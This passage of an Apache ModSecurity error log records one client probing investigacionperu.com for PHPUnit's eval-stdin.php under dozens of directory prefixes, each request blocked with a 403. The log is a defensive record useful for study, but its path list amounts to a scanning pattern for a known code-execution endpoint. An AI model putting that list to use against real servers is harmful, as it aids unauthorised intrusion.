"/2019/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPgXNvnD7WSFYwghj6AAAAM8"] [Thu Mar 30 12:05:02.583120 2023] [:error] [pid 9378:tid 140296055654144] [client 5.161.102.105:38328] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/2020/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPgXNvnD7WSFYwghj6QAAAME"] [Thu Mar 30 12:05:02.651495 2023] [:error] [pid 8934:tid 140295811282688] [client 5.161.102.105:38330] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPvga235zLtbfUvz-XwAAABY"] [Thu Mar 30 12:05:02.678875 2023] [:error] [pid 8936:tid 140295895209728] [client 5.161.102.105:38332] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPtT1kWaQLjv80FSPBwAAAIw"] [Thu Mar 30 12:05:02.752577 2023] [:error] [pid 9378:tid 140295962351360] [client 5.161.102.105:38334] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPgXNvnD7WSFYwghj6gAAAMQ"] [Thu Mar 30 12:05:02.776906 2023] [:error] [pid 8935:tid 140295895209728] [client 5.161.102.105:38336] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/payment/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPmQ0QQSV-J3o6GozLwAAAEw"] [Thu Mar 30 12:05:02.798252 2023] [:error] [pid 9378:tid 140295828068096] [client 5.161.102.105:38338] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/pos/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPgXNvnD7WSFYwghj6wAAANQ"] [Thu Mar 30 12:05:02.818954 2023] [:error] [pid 8934:tid 140295953958656] [client 5.161.102.105:38340] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPvga235zLtbfUvz-YAAAAAU"] [Thu Mar 30 12:05:02.840021 2023] [:error] [pid 9378:tid 140295979136768] [client 5.161.102.105:38342] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/reports/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPgXNvnD7WSFYwghj7AAAAMI"] [Thu Mar 30 12:05:02.863485 2023] [:error] [pid 9378:tid 140295811282688] [client 5.161.102.105:38344] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/server/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPgXNvnD7WSFYwghj7QAAANY"] [Thu Mar 30 12:05:02.883653 2023] [:error] [pid 9378:tid 140296064046848] [client 5.161.102.105:38346] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/portal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPgXNvnD7WSFYwghj7gAAAMA"] [Thu Mar 30 12:05:02.914497 2023] [:error] [pid 9378:tid 140295903602432] [client 5.161.102.105:38348] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/support/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPgXNvnD7WSFYwghj7wAAAMs"] [Thu Mar 30 12:05:02.983577 2023] [:error] [pid 9378:tid 140295937173248] [client 5.161.102.105:38350] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/site/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPgXNvnD7WSFYwghj8AAAAMc"] [Thu Mar 30 12:05:03.003764 2023] [:error] [pid 8934:tid 140295861638912] [client 5.161.102.105:38352] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/client/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBP_ga235zLtbfUvz-YQAAABA"] [Thu Mar 30 12:05:03.078183 2023] [:error] [pid 8936:tid 140295903602432] [client 5.161.102.105:38354] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/my/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBP9T1kWaQLjv80FSPCAAAAIs"] [Thu Mar 30 12:05:03.110320 2023] [:error] [pid 9378:tid 140295844853504] [client 5.161.102.105:38356] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/tickets/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPwXNvnD7WSFYwghj8QAAANI"] [Thu Mar 30 12:05:03.133475 2023] [:error] [pid 8934:tid 140295920387840] [client 5.161.102.105:38358] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/support/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBP_ga235zLtbfUvz-YgAAAAk"] [Thu Mar 30 12:05:03.154877 2023] [:error] [pid 9378:tid 140295836460800] [client 5.161.102.105:38360] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/techsupport/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPwXNvnD7WSFYwghj8gAAANM"] [Thu Mar 30 12:05:03.240635 2023] [:error] [pid 8934:tid 140295937173248] [client 5.161.102.105:38362] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/soporte/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBP_ga235zLtbfUvz-YwAAAAc"] [Thu Mar 30 12:05:03.305422 2023] [:error] [pid 8934:tid 140295870031616] [client 5.161.102.105:38364] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/opensupports/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBP_ga235zLtbfUvz-ZAAAAA8"] [Thu Mar 30 12:05:03.328595 2023] [:error] [pid 8934:tid 140295970744064] [client 5.161.102.105:38366] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/ticket/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBP_ga235zLtbfUvz-ZQAAAAM"] [Thu Mar 30 12:05:03.348883 2023] [:error] [pid 8934:tid 140295886817024] [client 5.161.102.105:38368] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/v1/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBP_ga235zLtbfUvz-ZgAAAA0"] [Thu Mar 30 12:05:03.376939 2023] [:error] [pid 9378:tid 140295853246208] [client 5.161.102.105:38370] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/v2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPwXNvnD7WSFYwghj8wAAANE"] [Thu Mar 30 12:05:03.443496 2023] [:error] [pid 9378:tid 140295802889984] [client 5.161.102.105:38372] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/bugtracker/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPwXNvnD7WSFYwghj9AAAANc"] [Thu Mar 30 12:05:03.498909 2023] [:error] [pid 9378:tid 140295886817024] [client 5.161.102.105:38374] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/beta/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPwXNvnD7WSFYwghj9QAAAM0"] [Thu Mar 30 12:05:03.523000 2023] [:error] [pid 9378:tid 140295970744064] [client 5.161.102.105:38376] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/helpdesk/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPwXNvnD7WSFYwghj9gAAAMM"] [Thu Mar 30 12:05:03.583610 2023] [:error] [pid 8936:tid 140295886817024] [client 5.161.102.105:38378] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/help/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBP9T1kWaQLjv80FSPCQAAAI0"] [Thu Mar 30 12:05:03.635783 2023] [:error] [pid 9378:tid 140295953958656] [client 5.161.102.105:38382] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPwXNvnD7WSFYwghj-AAAAMU"] [Thu Mar 30 12:05:03.654805 2023] [:error] [pid 9378:tid 140295878424320] [client 5.161.102.105:38384] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/backend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPwXNvnD7WSFYwghj-QAAAM4"] [Thu Mar 30 12:05:03.674165 2023] [:error] [pid 8936:tid 140295878424320] [client 5.161.102.105:38386] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/login/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBP9T1kWaQLjv80FSPCgAAAI4"] [Thu Mar 30 12:05:03.710798 2023] [:error] [pid 8934:tid 140295878424320] [client 5.161.102.105:38388] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBP_ga235zLtbfUvz-ZwAAAA4"] [Thu Mar 30 12:05:04.091049 2023] [:error] [pid 8936:tid 140295853246208] [client 5.161.102.105:38392] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQNT1kWaQLjv80FSPCwAAAJE"] [Thu Mar 30 12:05:04.151220 2023] [:error] [pid 8935:tid 140295870031616] [client 5.161.102.105:38394] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/dev1/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQGQ0QQSV-J3o6GozMAAAAE8"] [Thu Mar 30 12:05:04.178850 2023] [:error] [pid 9378:tid 140295928780544] [client 5.161.102.105:38396] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/back/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQAXNvnD7WSFYwghj-gAAAMg"] [Thu Mar 30 12:05:04.202656 2023] [:error] [pid 8936:tid 140295953958656] [client 5.161.102.105:38398] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/clientes/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQNT1kWaQLjv80FSPDAAAAIU"] [Thu Mar 30 12:05:04.251902 2023] [:error] [pid 8935:tid 140295886817024] [client 5.161.102.105:38400] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/adv/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQGQ0QQSV-J3o6GozMQAAAE0"] [Thu Mar 30 12:05:04.277893 2023] [:error] [pid 8934:tid 140295911995136] [client 5.161.102.105:38402] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/secure/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQPga235zLtbfUvz-aAAAAAo"] [Thu Mar 30 12:05:04.308317 2023] [:error] [pid 9378:tid 140295828068096] [client 5.161.102.105:38404] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 